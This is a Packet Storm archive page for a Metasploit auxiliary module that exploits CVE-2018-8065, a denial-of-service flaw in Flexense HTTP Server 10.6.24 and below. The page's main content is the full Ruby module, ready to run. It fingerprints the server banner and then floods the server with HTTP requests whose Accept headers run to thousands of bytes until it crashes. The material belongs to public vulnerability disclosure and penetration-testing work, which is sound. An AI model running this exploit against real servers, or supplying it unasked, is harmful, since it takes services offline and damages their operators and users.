what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Flexense HTTP Server 10.6.24 Buffer Overflow / Denial Of Service

Flexense HTTP Server 10.6.24 Buffer Overflow / Denial Of Service
Posted Jun 1, 2023
Authored by Ege Balci | Site metasploit.com

This Metasploit module triggers a denial of service vulnerability in the Flexense HTTP server. The vulnerability is caused by a user mode write access memory violation and can be triggered with rapidly sending a variety of HTTP requests with long HTTP header values. Multiple Flexense applications that are using Flexense HTTP server versions 10.6.24 and below are vulnerable.

tags | exploit, web, denial of service, overflow
advisories | CVE-2018-8065
SHA-256 | 813816198b6e0b95d0076b6edc4437a705a53f10378492556a643fa2b78999b8

Flexense HTTP Server 10.6.24 Buffer Overflow / Denial Of Service

Change Mirror Download
##
# Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)
# Date: 2018-03-09
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.flexense.com/downloads.html
# Version: <= 10.6.24
# CVE : CVE-2018-8065

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Flexense HTTP Server Denial Of Service',
'Description' => %q{
This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
Vulnerability caused by a user mode write access memory violation and can be triggered with
rapidly sending variety of HTTP requests with long HTTP header values.

Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
},
'Author' => [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-8065'],
[ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
],
'DisclosureDate' => '2018-03-09'))

register_options(
[
Opt::RPORT(80),
OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ])
])

end

def check
begin
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
res = sock.get
if res and res.include? 'Flexense HTTP Server v10.6.24'
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue Rex::ConnectionRefused
print_error("Target refused the connection")
Exploit::CheckCode::Unknown
rescue
print_error("Target did not respond to HTTP request")
Exploit::CheckCode::Unknown
end
end

def run
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end

size = datastore['PacketSize'].to_i
print_status("Starting with packets of #{size}-byte strings")

count = 0
loop do
payload = ""
payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
payload << "Host: 127.0.0.1\r\n"
payload << "Accept: "+('A' * size)+"\r\n"
payload << "\r\n\r\n"
begin
connect
sock.put(payload)
disconnect
count += 1
break if count==datastore['PacketCount']
rescue ::Rex::InvalidDestination
print_error('Invalid destination! Continuing...')
rescue ::Rex::ConnectionTimeout
print_error('Connection timeout! Continuing...')
rescue ::Errno::ECONNRESET
print_error('Connection reset! Continuing...')
rescue ::Rex::ConnectionRefused
print_good("DoS successful after #{count} packets with #{size}-byte headers")
return true
end
end
print_error("DoS failed after #{count} packets of #{size}-byte strings")
end
end

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close